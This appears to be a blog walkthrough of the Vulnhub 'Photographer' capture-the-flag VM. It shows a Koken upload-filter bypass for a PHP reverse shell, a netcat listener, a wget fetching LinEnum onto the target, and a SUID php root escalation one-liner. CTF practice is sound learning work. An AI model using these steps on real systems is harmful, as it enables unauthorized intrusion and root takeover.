How to hack: Photographer CTF — Vulnhub walkthrough

On this guide I’ll show you the steps to get the two flags (user.txt and proof.txt) hidden in this CTF.

We start by downloading the VM from https://www.vulnhub.com/entry/photographer-1,519/ load the .ova to VirtualBox and start it up.

We are greeted by the Ubuntu login screen and 2 users listed: agi and daisa, since I have this GUI access I can click on the up/down arrow icon and select connection information to view the machine’s IP address:

Or use netdiscovery …

I’ll now use NMAP to find open ports:

And we have two HTTP ports and two for SMB

Port 80 has a basic page with not much information:

Port 8000 has a section built using Koken

If I mount the smb share, I can get to a folder with anonymous authentication and find and email and a wordpress backup file.

The wordpress dump doesn’t have any configuration information or plugins/themes which won’t help.

The email hints at the secret being “babygirl”

Who sends these emails anyway…

SSH is not enabled so I’ll fiddle more with Koken to see where the entry point is, looking at the html source, we’re using version 0.22.24, by googling koken admin I find that /admin has the admin panel, so I log in using daisa/babygirl

Since I have literally no idea on how to use koken or know any exploits, I’ll just go to exploit-db and look for something:

One result and matches the version we got from the html: https://www.exploit-db.com/exploits/48706

The exploit consists in that we can upload a file masked as an allowed filetype, but intercept the post command and replace the filename with whatever we want and it will get written like so, I guess the extension validation is done in HTML/JS only but the backend writes whatever it receives, this time I’ll do it with burp as it is what the vulnerability creator is using.

We’ll be uploading a reverse shell script in PHP, I usually go for p0wny-shell (https://github.com/flozz/p0wny-shell) that way I don’t need to masquerade the traffic but since this is a local VM, PHP-reverse-shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) will suffice, we download the file on our computer, extract the .php and edit the IP and port settings, and save it with a .jpg extension (shell.jpg for me):

Use p0wny-shell if you don’t want to leave your IP in the server in an obvious place …

Following the exploit recipe, we open up BurpSuite, go to the proxies tab, intercept, use the bundled browser OR configure yours to use burp as a proxy (127.0.0.1:8080), then on Koken, click on “import content” in the bottom right corner and drop our shell.jpg file, click import and then go to burp, look for the instances of the filename and change the extension to shell.php

Lines 17 and 43 were modified

Once the file is uploaded, we can close Burp+disable the proxy, go to content and look for the recently uploaded file, on the sidebar we can see the link when hovering on download file, before we go there, I’ll open a NetCat listener on kali:

nc -v -n -l -p 1234

browse to the shell page and that will open up the session on NetCat

Once we’re inside, we can peek into the users home folders and daisa will have our first flag (user.txt)

Since we’re via the php shell, everything runs as www-data so we’ll be in read-only mode for most folders :(

We need to find a way to swap users, there are millions of possible ways to do it, I’ll be lazy and use LinEnum (https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) for the obvious ones:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

then just sh LinEnum.sh and we’ll get a long report of what is going on in the VM:

If we look into the SUID section (more info here: https://www.linuxnix.com/suid-set-suid-linuxunix/) PHP is running with the SUID flag on, which means we can use the PHP parser to run stuff as root, we use our cheatsheet from GTFOBins (https://gtfobins.github.io/gtfobins/php/)

sudo sh -c 'cp $(which php) .; chmod +s ./php'

CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"

And we can take only the last line and adjust it a bit:

Once we’re there, we can go to the root folder and find our flag (proof.txt):

And that’s the end of this CTF :)